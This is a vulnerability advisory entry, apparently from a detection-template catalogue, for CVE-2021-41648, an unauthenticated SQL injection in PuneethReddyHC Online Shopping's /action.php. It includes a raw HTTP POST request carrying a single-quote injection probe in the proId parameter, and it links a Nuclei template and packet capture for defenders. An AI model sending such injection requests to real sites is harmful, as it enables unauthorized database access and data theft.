| Title | PuneethReddyHC action.php SQL Injection |
|---|---|
| Author | daffainfo |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. |
| Remediation | Upgrade to the latest version to mitigate this vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.63228 |
| CVE ID | CVE-2021-41648 |
| CWE ID | CWE-89 |
| Tags | cve2021 cve sqli packetstorm online-shopping-system-advanced_project vuln |
An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input.
POST /action.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Connection: close
Content-Length: 20
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
proId=1'&addToCart=1
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-41648.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-41648.pcap
N/AN/A